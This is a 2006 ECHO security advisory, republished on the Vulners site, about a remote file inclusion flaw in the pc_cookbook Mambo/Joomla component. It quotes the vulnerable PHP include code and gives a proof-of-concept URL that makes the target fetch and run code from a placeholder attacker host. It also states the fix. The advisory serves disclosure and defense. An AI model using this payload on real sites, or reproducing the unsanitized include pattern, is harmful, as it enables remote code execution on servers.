Vulners
Lucene search
Echo Security Advisory 2006.37
`\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_37$2006
-----------------------------------------------------------------------------------------------
[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities
-----------------------------------------------------------------------------------------------
Author : Ahmad Maulana a.k.a Matdhule
Date : July 10th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
pc_cookbook Component
Application : pc_cookbook Component
version : 0.3
URL : http://www.dianthos.net & http://www.fisheye.gr/koyansblog
------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~
in folder com_pccookbook we found vulnerability script pccookbook.php.
-----------------------pccookbook.php----------------------
....
<?php
//pc_cookbook Component//
/**
* Content code
* @package hello_world
* Original @Copyright (C) 2005 Robert Prince
* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis
* @ All rights reserved
* @ pc_cookbook is Free Software
* @ Released under GNU/GPL License :
http://www.gnu.org/copyleft/gpl.html
* @version koyans 0.3
* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog
**/
global $mosConfig_absolute_path;
global $mosConfig_live_site;
// include language file, or default to english
if (file_exists ($mosConfig_absolute_path .
'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {
include_once ($mosConfig_absolute_path .
'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');
} else {
include_once ($mosConfig_absolute_path .
'/components/com_pccookbook/languages/english.php');
} // end if
?>
...
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized. When
register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi
g_absolute_path=http://attacker.com/evil.txt?
Solution:
~~~~~~~~
sanitize variabel $mosConfig_absolute_path in pccookbook.php
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ [email protected], [email protected]
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ]----------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2006 00:00Current
0.4Low risk
Vulners AI Score0.4